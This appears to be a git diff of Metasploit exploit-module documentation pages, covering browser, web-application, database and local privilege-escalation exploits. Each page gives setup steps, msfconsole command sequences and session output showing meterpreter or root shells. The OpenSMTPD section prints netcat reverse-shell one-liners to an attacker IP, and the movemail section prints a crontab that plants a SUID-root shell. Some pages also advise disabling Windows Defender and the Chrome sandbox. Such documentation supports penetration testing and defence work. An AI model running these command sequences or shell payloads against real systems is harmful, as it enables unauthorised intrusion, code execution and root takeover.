+```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox```
+
+```
+msf5 > use exploit/multi/browser/chrome_jscreate_sideeffect
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set URIPATH /
+URIPATH => /
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Using URL: http://192.168.56.1:8080/
+[*] Server started.
+
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
+[*] 192.168.56.3     chrome_jscreate_sideeffect - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
+[*] Sending stage (206403 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49677) at 2020-03-04 21:22:38 +0800
+
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > pwd
+C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.87
+meterpreter >
+```
@@ -0,0 +1,61 @@
+This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary.
+The type confusion can be used to construct a arbitrary read/write memory primitive, which is used to write shellcode into rwx region of a WebAssembly object.
+
+**This module does not contain an exploit to escape the sandbox, so you must launch Google Chrome with the --no-sandbox option**
+
+## Vulnerable Application
+
+The module is compatible with any 64bit Google Chrome (version 67, 68 or 69), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
+
+**Vulnerable Application Installation Steps**
+
+You can download a vulnerable Chrome version from this location:
+[https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/](https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/)
+
+You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet).
+You may also need to disable Windows Defender.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/browser/chrome_object_create```
+2. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set SRVHOST [IP]```
+3. Do: ```set URIPATH / [PATH]```
+4. Do: ```run```
+
+## Scenarios
+
+### Windows 10 and Google Chrome 69.0.3497.100 with --no-sandbox
+
+Start Google Chrome without a sandbox:
+```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox```
+
+```
+msf5 > use exploit/multi/browser/chrome_object_create
+msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_object_create) > set URIPATH /
+URIPATH => /
+msf5 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_object_create) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/browser/chrome_object_create) >
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Using URL: http://192.168.56.1:8080/
+[*] Server started.
+[*] 192.168.56.3     chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+[*] Sending stage (206403 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49682) at 2020-02-29 14:29:06 +0800
+
+msf5 exploit(multi/browser/chrome_object_create) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > pwd
+C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.100
+meterpreter >
+```
@@ -1,14 +1,14 @@
-## Description
+## Vulnerable Application
+
+### Description

 A malicious file can be uploaded by an unauthenticated attacker through the `actions/beats_uploader.php` script.
 ClipBucket < 4.0.0 - Release 4902 is vulnerable.  Additional information and vulnerabilities can be viewed on
 Exploit-DB [44250](https://www.exploit-db.com/exploits/44250/)

-## Vulnerable Application
-
 Available at [Exploit-DB](https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip)

-## Vulnerable Application Installation
+### Installation

 Download Application: ```wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip```

@@ -0,0 +1,31 @@
+## Vulnerable Application
+
+This module exploits an arbitrary command execution flaw
+in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL
+to the exec_raw.php page, an attacker may be able to execute arbitrary commands.
+
+NOTE: This module works best with php/meterpreter payloads.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/freenas_exec_raw```
+  4. Do: ```set rhost [ip]```
+  5. Do: ```run```
+  6. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### Unknown
+
+```
+meterpreter > sysinfo
+Computer: freenas.local
+OS      : FreeBSD freenas.local 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Sat Jul 31 12:22:04 CEST 2010     root@dev.freenas.org:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
+meterpreter > getuid
+Server username: root (0)
+meterpreter >
+```
@@ -1,12 +1,14 @@
-## Description
+## Vulnerable Application
+
+### Description

 This module logs in to a GlassFish Server (Open Source or Commercial) using various methods (such as authentication bypass, default credentials, or user-supplied login), and deploys a malicious war file in order to get remote code execution. It has been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer GlassFish versions do not allow remote access (Secure Admin) by default, but is required for exploitation.

-## GlassFish
+### GlassFish

 GlassFish is a open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. The supported version is called Oracle GlassFish Server. GlassFish is free software, dual-licensed under two free software licences: the Common Development and Distribution License (CDDL) and the GNU General Public License (GPL) with the classpath exception.

-## Installation
+### Installation

 For testing purposes, the following explains how you can install a vulnerable version of GlassFish on Ubuntu Linux:

@@ -36,6 +38,8 @@ If you are on a different platform (such as Windows), the installation should be

 ## Scenarios

+### GlassFish 3.0.1 on Windows 2003
+
 ```
 msf > use exploit/multi/http/glassfish_deployer
 msf exploit(glassfish_deployer) > set RHOST 172.16.182.237
@@ -0,0 +1,51 @@
+## Vulnerable Application
+
+The Horde project comprises several standalone applications and libraries, the [Horde Groupware Webmail Edition suite](https://www.horde.org/apps/webmail) (tested version 5.2.22) bundles several of them by default, among those, Data ([Horde Data API](https://github.com/horde/Data)) is a library used to manage data import/export in several formats, e.g., CSV, iCalendar, vCard, etc. This library up to version 2.1.4 (included) is vulnerable to PHP code injection.
+
+Find more information in the [original advisory](https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/).
+
+## Verification Steps
+
+  1. Install the application (see below)
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/horde_csv_rce```
+  4. Do: ```set payload php/meterpreter/reverse_tcp```
+  5. Do: ```set lhost [ATTACKER IP]```
+  6. Do: ```set rhost [TARGET IP]```
+  7. Do: ```set username [username]```
+  8. Do: ```set password [password]```
+  9. Do: ```exploit```
+ 10. A session should open
+
+Downgrade the Horde Data API package if needed:
+
+```
+pear uninstall --ignore-errors horde/horde_data-2.1.5
+pear install --ignore-errors horde/horde_data-2.1.4
+```
+
+## Scenarios
+
+### Horde Groupware Webmail Edition 5.2.22 with Horde Data API 2.1.4 on Debian GNU/Linux 9
+
+```
+msf5 > use exploit/multi/http/horde_csv_rce
+msf5 exploit(multi/http/horde_csv_rce) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf5 exploit(multi/http/horde_csv_rce) > set lhost 192.168.1.69
+lhost => 192.168.1.69
+msf5 exploit(multi/http/horde_csv_rce) > set rhost 192.168.1.69
+rhost => 192.168.1.69
+msf5 exploit(multi/http/horde_csv_rce) > set username alice
+username => alice
+msf5 exploit(multi/http/horde_csv_rce) > set password alice
+password => alice
+msf5 exploit(multi/http/horde_csv_rce) > exploit
+
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Sending stage (38288 bytes) to 172.17.0.1
+[*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:44524) at 2020-03-14 14:55:17 +0000
+
+meterpreter > getuid
+Server username: www-data (33)
+```
@@ -10,15 +10,13 @@

 ## Verification Steps

-  Example steps in this format:
-
  1. Install the application
-  1. Start msfconsole
-  1. Do: ```use exploit/multi/http/jenkins_script_console```
-  1. Do: ```set RHOST [target host]```
-  1. Do: ```set TARGET [target id]```
-  1. Do: ```exploit```
-  1. You should get a shell.
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/jenkins_script_console```
+  4. Do: ```set RHOST [target host]```
+  5. Do: ```set TARGET [target id]```
+  6. Do: ```exploit```
+  7. You should get a shell.

 ## Options

@@ -7,9 +7,10 @@ code execution.
 Magento Community and Enterprise editions before 2.0.6 are affected. The magento_unserialize module
 was specifically tested against version 2.0.6, on Ubuntu 14.04 and Debian.

-For testing purposes, you can download the vulnerable applications [here](https://www.exploit-db.com/apps/d34a83e80f927d7336cc8ef37a9867f4-magento2-2.0.5.tar.gz).
+For testing purposes, you can download the vulnerable
+applications [here](https://www.exploit-db.com/apps/d34a83e80f927d7336cc8ef37a9867f4-magento2-2.0.5.tar.gz).

-## Verification Steps
+### Install

 To set up a vulnerable version of Magento, please follow these steps. This is specific to
 Ubuntu 14, and assumes you are installing Magento under /var/www/html/.
@@ -75,8 +76,7 @@ If at some point the IP (base URL) of Magento has changed, then you will need to
 8. Also do: ```sudo rm -rf var/page_cache/*```
 9. Browse to Magento again with the new IP, it should be up and running again.

-
-After setting up Magento, you can use your exploit module:
+## Verification Steps

 1. Start msfconsole
 2. Do: ```exploit/multi/http/magento_unserialize```
@@ -86,6 +86,8 @@ After setting up Magento, you can use your exploit module:
 6. Do: ```exploit```
 7. And you should get a session

+## Options
+
 ## Scenarios

 ```
@@ -0,0 +1,170 @@
+This module exploits an underflow vulnerability in versions 7.1.x below 7.1.33,
+7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on Nginx. Only servers
+with certains Nginx + PHP-FPM configurations are exploitable. This is a port of
+the original neex's exploit code (see refs.). First, it detects the correct
+parameters (Query String Length and custom header length) needed to trigger
+code execution. This step determines if the target is actually vulnerable
+(Check method). Then, the exploit sets a series of PHP INI directives to create
+a file (`/tmp/a`) locally on the target, which enables code execution through a
+query string parameter (`?a=<cmd>`). This is used to execute normal payload
+stagers. Finally, this module does some cleanup by killing local PHP-FPM
+workers (those are spawned automatically once killed) and removing the created
+local file (`/tmp/a`).
+
+## Vulnerable Application
+- Install Nginx on Linux (`apt-get install nginx`)
+- get the vulnerable PHP:
+
+```
+git clone https://github.com/php/php-src
+# checkout the fix
+git -C php-src checkout ab061f95ca966731b1c84cf5b7b20155c0a1c06a
+# checkout the commit previous to the fix
+git -C php-src checkout HEAD~1
+```
+
+- make sure the default Nginx configuration contains these entries and no
+  script existence checks (like `try_files`):
+
+```
+location ~ [^/]\.php(/|$) {
+  ...
+  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
+  fastcgi_param PATH_INFO       $fastcgi_path_info;
+  fastcgi_pass   php:9000;
+  ...
+}
+```
+
+See original PoC for details: https://github.com/neex/phuip-fpizdam
+
+An easiest way to setup a vulnerable instance is to use the docker
+configuration provided by the author
+(https://github.com/neex/phuip-fpizdam/tree/master/reproducer)
+
+## Verification Steps
+
+  Preparing the target:
+
+  1. `git clone https://github.com/neex/phuip-fpizdam`
+  2. `cd phuip-fpizdam/reproducer/`
+  3. `docker build -t reproduce-cve-2019-11043 .`
+  4. `docker run --rm -p 192.168.6.6:8080:80 --name reproduce-cve-2019-11043 reproduce-cve-2019-11043`
+
+  Running the exploit:
+
+  1. `./msfconsole`
+  2. `use exploit/multi/http/php_fpm_rce`
+  4. `set RHOSTS 192.168.6.6`
+  5. `set RPORT 8080`
+  4. `set TARGETURI /script.php`
+  6. `set PAYLOAD php/meterpreter/reverse_tcp`
+  7. `set LHOST 192.168.6.6`
+  8. `run`
+
+## Options
+
+   **TARGETURI**
+   Path to a PHP page (`/index.php` by default). This must be a valid page.
+
+## Advanced Options
+
+  **MinQSL**
+  Minimum query string length (QSL). The QSL detection engine will iterate
+  starting from this value (1500 by default). This option is required.
+
+  **MaxQSL**
+  Maximum query string length (QSL). The QSL detection engine will iterate
+  until this value is reached (1950 by default). This option is required.
+
+  **QSLHint**
+  Query string length hint. This value will be used as a QSL candidate. Note
+  that setting this value skips the QSL detection.
+
+  **QSLDetectStep**
+  Query string length detect step. The QSL detection engine will iterate with
+  this step value (5 by default). This option is required.
+
+  **MaxQSLCandidates**
+  Maximum query string length candidates. When the number of QSL candidates
+  found during the QSL detection phase is greater than this value (10 by
+  default), this indicates that something went wrong and we were not able to
+  detect the correct values. This option is required.
+
+  **MaxQSLDetectDelta**
+  Maximum query string length detection delta. This value is the maximum
+  distance between the candidate and the extended values (10 by default). For
+  example, with a value of 20 and QSLDetectStep set to 5, candidate [1700] will
+  be extended to [1680, 1685, 1690, 1695, 1700]. This option is required.
+
+  **MaxCustomHeaderLength**
+  Maximum custom header length. This value is the maximum length that will be
+  used for the custom header during the parameters detection (256 by default).
+  This option is required.
+
+  **CustomHeaderLengthHint**
+  Custom header length hint. This value will be used as the custom header
+  length. Note that setting this value skips the custom header length
+  detection.
+
+  **DetectMethod**
+  Method that will be used to detect if the target is vulnerable. Available
+  methods:
+
+  1. `session.auto_start`: this method consist in setting the
+  `session.auto_start` PHP option to 1. If the response contains `PHPSESSID=`
+  set-cookie value, this means the PHP option has been correctly set and the
+  target is vulnerable.
+  2. `output_handler.md5`: this method consist in setting the `output_handler`
+  PHP option to `md5`. If the response is a md5 hash (16 characters), this
+  means the PHP option has been correctly set and the target is vulnerable.
+
+  **OperationMaxRetries**
+  Maximum of operation retries. Each operation will be repeated at most
+  `OperationMaxRetries` times.
+
+## Scenarios
+
+### Ubuntu 18.04 + nginx 1.14.0 + PHP 7.1.33dev (fpm-fcgi) (built: Feb 14 2020 16:48:15)
+
+```
+msf5 > use exploit/multi/http/php_fpm_rce
+msf5 exploit(multi/http/php_fpm_rce) > set RHOSTS 192.168.6.6
+RHOSTS => 192.168.6.6
+msf5 exploit(multi/http/php_fpm_rce) > set RPORT 8080
+RPORT => 8080
+msf5 exploit(multi/http/php_fpm_rce) > set TARGETURI /script.php
+TARGETURI => /script.php
+msf5 exploit(multi/http/php_fpm_rce) > set PAYLOAD php/meterpreter/reverse_tcp
+PAYLOAD => php/meterpreter/reverse_tcp
+msf5 exploit(multi/http/php_fpm_rce) > set LHOST 192.168.6.6
+LHOST => 192.168.6.6
+msf5 exploit(multi/http/php_fpm_rce) > run
+
+[*] Started reverse TCP handler on 192.168.6.6:4444
+[*] Sending baseline query...
+[*] Detecting QSL...
+[+] The target is probably vulnerable. Possible QSLs: [1765]
+[*] Doing sanity check...
+[*] Detecting attack parameters...
+[+] Parameters found: QSL=1760, customh_length=69
+[+] Target is vulnerable!
+[*] Performing attack using php.ini settings...
+[+] Success! Was able to execute a command by appending 'which+which'
+[*] Trying to cleanup /tmp/a...
+[+] Cleanup done!
+[*] Sending payload...
+[*] Sending stage (38288 bytes) to 192.168.6.6
+[*] Meterpreter session 1 opened (192.168.6.6:4444 -> 192.168.6.6:59177) at 2020-02-14 12:03:45 -0600
+[+] Session created
+[*] Remove /tmp/a and kill workers...
+[+] Done!
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : 832efebeac57
+OS          : Linux 832efebeac57 4.9.184-linuxkit #1 SMP Tue Jul 2 22:58:16 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -0,0 +1,30 @@
+## Description
+
+PHPStudy is free software, it is a one-click installation software, which includes PHP, MySQL, Apache and more. At some point in time, hackers were able to hack into phpStudy and tamper on 2016 and 2018 versions of the software to make it vulnerable to this specific exploit.
+
+## Vulnerable Application
+
+The vulnerability exists in php-5.4.45 and php-5.2.17 service versions in PHPStudy2016 and PHPStudy2018
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do:```use exploit/multi/http/phpstudy_backdoor_rce``` 
+3. Do:```set rhosts <target>```
+4. Do:```run```
+
+If your target is vulnerable, you will get a shell. 
+you should see an output similar to the following
+
+```
+msf5 exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104
+rhosts => 192.168.56.104
+msf5 exploit(multi/http/phpstudy_backdoor_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Sending shellcode
+[*] Sending stage (38288 bytes) to 192.168.56.104
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:49169) at 2020-02-23 10:11:40 +0800
+
+meterpreter > 
+```
@@ -1,14 +1,20 @@
 ## Vulnerable Application

-This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance. The first is an authentication bypass vulnerability via a file delete in logoff.cgi which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi interface (CVE-2016-7547).
+This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance. The first is an authentication
+bypass vulnerability via a file delete in logoff.cgi which resets the admin password back to 'admin' upon a
+reboot (CVE-2016-7552). The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi interface (CVE-2016-7547).

-Note: You have the option to use the authentication bypass or not since it requires that the server is rebooted. The password reset will render the authentication useless. Typically, if an administrator cant login, they will bounce the box. Therefore, this module performs a heart beat request until the box is bounced and then attempts to login and to perform the command injection. This module has been tested on version 2.6.1062r1 of the appliance.
+Note: You have the option to use the authentication bypass or not since it requires that the server is rebooted.
+The password reset will render the authentication useless. Typically, if an administrator cant login, they will bounce the box.
+Therefore, this module performs a heart beat request until the box is bounced and then attempts to login and to
+perform the command injection. This module has been tested on version 2.6.1062r1 of the appliance.

-Trend Micro are not patching this vulnerability since this product is now ([EOL](https://success.trendmicro.com/solution/1105727-list-of-end-of-life-eol-end-of-support-eos-trend-micro-products)).
+Trend Micro are not patching this vulnerability since this
+product is now ([EOL](https://success.trendmicro.com/solution/1105727-list-of-end-of-life-eol-end-of-support-eos-trend-micro-products)).

 ![Demo](http://srcincite.io/poc/CVE-2016-7547.gif)

-**Vulnerable Application Installation Steps**
+### Vulnerable Application Installation Steps

 List the steps needed to make sure this thing works

@@ -17,9 +23,31 @@ List the steps needed to make sure this thing works
 - [ ] Click through the default install.
 - [ ] You are ready to burn.

-**Verification Steps**
+## Verification Steps

-A successful check of the exploit will look like this:
+  1. Install the appliance
+  2. Start metasploit
+  3. Do: ```use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi```
+  4. Do: ```set payload linux/x86/meterpreter/reverse_tcp```
+  5. Do: ```set RHOST [IP]```
+  6. Do: ```set LHOST [IP]```
+  7. Do: ```exploit```
+  8. The exploit will reset the admin password, now reboot the VM.
+  9. After reboot, you receive a root shell
+
+## Options
+
+### PASSWORD
+
+Password for the system.  Default is `admin`.
+
+### AUTHBYPASS
+
+Bypass the system's authentication.  Defaults to `true`
+
+## Scenarios
+
+### Trendmicro Threat Discovery Appliance 2.6.1062r1

 ```
 saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc 
@@ -1,20 +1,20 @@
+## Vulnerable Application
+
 This module attempts to create a new table, then execute system commands in the
 context of copying the command output into the table.

 This module should work on all Postgres systems running version 9.3 and above.

-## Vulnerable Application
-
-  Download any version of PostgreSQL from 9.3 to 11.2 (Latest at time of writing)
-  Set up the software and connect as the postgres superuser.
-  Use the techniques described in this blogpost to verify command execution:
-    https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
+Download any version of PostgreSQL from 9.3 to 11.2 (Latest at time of writing)
+Set up the software and connect as the postgres superuser.
+Use the techniques described in this blogpost to verify command execution:
+  https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

 ## Verification Steps

  You must be able to connect to the PostgreSQL database, and have a valid set of superuser
  credentials, or a user in the 'pg_execute_server_program' group
-  
+
  Exploiting Linux/OSX:

    1. Start msfconsole
@@ -27,7 +27,7 @@ This module should work on all Postgres systems running version 9.3 and above.
    8. set LHOST my.ip.add.ress
    9. set LHOST myport
    10. exploit
-  
+
  Exploiting Windows:

    1. Start msfconsole
@@ -45,31 +45,30 @@ This module should work on all Postgres systems running version 9.3 and above.
    13. set DATABASE postgres
    14. exploit

-
 ## Options

  **TABLENAME**
-  
+
  The name of the table to create in the database, default is set to 'msftesttable', this table will be dropped create a new
  one each time the exploit is run.
-  
+
  **DUMP_TABLE_OUTPUT**

-  If enabled this option will perform a select statement on the created table before it is deleted. This can be used for 
-  debugging if there are problems with a command being executed. 
-  
+  If enabled this option will perform a select statement on the created table before it is deleted. This can be used for
+  debugging if there are problems with a command being executed.
+
  **DATABASE**
-  
+
  Name of the database to connect to
-  
+
  **USERNAME**
-  
+
  A valid username that allows access to the database
-  
+
  **PASSWORD**
-  
+
  A valid password that allows access to the database
-  
+
 ## Scenarios

 ### Exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04
@@ -114,7 +113,7 @@ This module should work on all Postgres systems running version 9.3 and above.
       Id  Name
       --  ----
       0   Automatic
-   
+    
     msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

    [*] Started reverse TCP handler on 192.168.0.18:4456
@@ -133,10 +132,9 @@ This module should work on all Postgres systems running version 9.3 and above.
    Linux ubuntu 4.15.0-45-generic #48-Ubuntu SMP Tue Jan 29 16:28:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
    /usr/lib/postgresql/11/bin/postgres -V
    postgres (PostgreSQL) 11.2 (Ubuntu 11.2-1.pgdg18.04+1)
-   
+
 ### Exploiting PostgreSQL 10.7 on Windows 10

-    
    msf5 exploit(multi/script/web_delivery) > set target 2
    target => 2
    msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
@@ -1,10 +1,13 @@
-## Introduction
+## Vulnerable Application
+
+### Description

 This module exploits a SUID installation of the Emacs `movemail` utility
 to run a command as root by writing to 4.3BSD's `/usr/lib/crontab.local`.
+
 The vulnerability is documented in Cliff Stoll's book *The Cuckoo's Egg*.

-## Setup
+### Setup

 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -14,7 +17,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-## Targets
+### Targets

 ```
 Id  Name
@@ -22,6 +25,10 @@ Id  Name
 0   /usr/lib/crontab.local
 ```

+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options

 **MOVEMAIL**
@@ -34,15 +41,34 @@ If your payload is `cmd/unix/generic` (suggested default), set this to
 the command you want to run as root. The provided default will create a
 SUID-root shell at `/tmp/sh`.

-## Usage
+## Scenarios
+
+### 4.3BSD

 ```
+msf5 > use exploit/unix/local/emacs_movemail
+msf5 exploit(unix/local/emacs_movemail) > show missing
+
+Module options (exploit/unix/local/emacs_movemail):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+
+Payload options (cmd/unix/generic):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+msf5 exploit(unix/local/emacs_movemail) > set session -1
+session => -1
 msf5 exploit(unix/local/emacs_movemail) > run

 [*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
-[*] Current shell is /bin/sh
+[-] Current shell is unknown
 [*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
-[+] SUID-root [redacted] found
+[+] SUID-root /etc/movemail found
 [*] Preparing crontab with payload
 * * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
 * * * * * root rm -f /usr/lib/crontab.local
@@ -50,12 +76,5 @@ msf5 exploit(unix/local/emacs_movemail) > run
 [+] Writing crontab to /usr/lib/crontab.local
 [!] Please wait at least one minute for effect
 [*] Exploit completed, but no session was created.
-msf5 exploit(unix/local/emacs_movemail) > sessions -1
-[*] Starting interaction with 1...
-
-ls -l /usr/lib/crontab.local /tmp/sh
-/usr/lib/crontab.local not found
-rwsr-xr-x  1 root        23552 Nov 22 15:17 /tmp/sh
-/tmp/sh -c whoami
-root
+msf5 exploit(unix/local/emacs_movemail) >
 ```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an out-of-bounds read of an attacker-controlled
+string in OpenSMTPD's MTA implementation to execute a command as the
+root or nobody user, depending on the kind of grammar OpenSMTPD uses.
+
+### Setup
+
+1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
+2. Install the system
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   OpenSMTPD < 6.6.4 (automatic grammar selection)
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**SESSION**
+
+Set this to a valid session ID on an OpenBSD target.
+
+## Scenarios
+
+### OpenSMTPD 6.6.0 on OpenBSD 6.6
+
+```
+msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show missing
+
+Module options (exploit/unix/local/opensmtpd_oob_read_lpe):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
+session => 1
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
+
+[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0</tmp/gkhbba | /bin/sh >/tmp/gkhbba 2>&1; rm /tmp/gkhbba
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] OpenSMTPD 6.6.0 is using new grammar
+[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
+[*] Started service listener on 0.0.0.0:25
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.137:37747 connected
+[*] Exploiting new OpenSMTPD grammar for a root shell
+[*] Faking SMTP server and sending exploit
+[*] Sending: 220
+[*] Expecting: /EHLO /
+[+] Received: EHLO
+[*] Sending: 250
+[*] Expecting: /MAIL FROM:<[^>]/
+[+] Received: foo.localdomain
+MAIL FROM:<w
+[*] Sending: 553-
+553
+
+dispatcher: local_mail
+type: mda
+mda-user: root
+mda-exec: mkfifo /tmp/rettgqm; nc 172.16.249.1 4444 0</tmp/rettgqm | /bin/sh >/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0
+
+[*] Disconnecting client 172.16.249.137:37747
+[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+uname -a
+OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
+^Z
+Background session 3? [y/N]  y
+```
+
+### OpenSMTPD 6.0.4 on OpenBSD 6.3
+
+```
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
+session => 2
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
+
+[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0</tmp/hkioy | /bin/sh >/tmp/hkioy 2>&1; rm /tmp/hkioy
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] OpenSMTPD 6.0.4 is using old grammar
+[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
+[*] Started service listener on 0.0.0.0:25
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.138:10203 connected
+[*] Exploiting old OpenSMTPD grammar for a nobody shell
+[*] Faking SMTP server and sending exploit
+[*] Sending: 220
+[*] Expecting: /EHLO /
+[+] Received: EHLO
+[*] Sending: 250
+[*] Expecting: /MAIL FROM:<[^>]/
+[+] Received: foo.localdomain
+MAIL FROM:<w
+[*] Sending: 553-
+553
+
+type: mda
+mda-method: mda
+mda-usertable: <getpwnam>
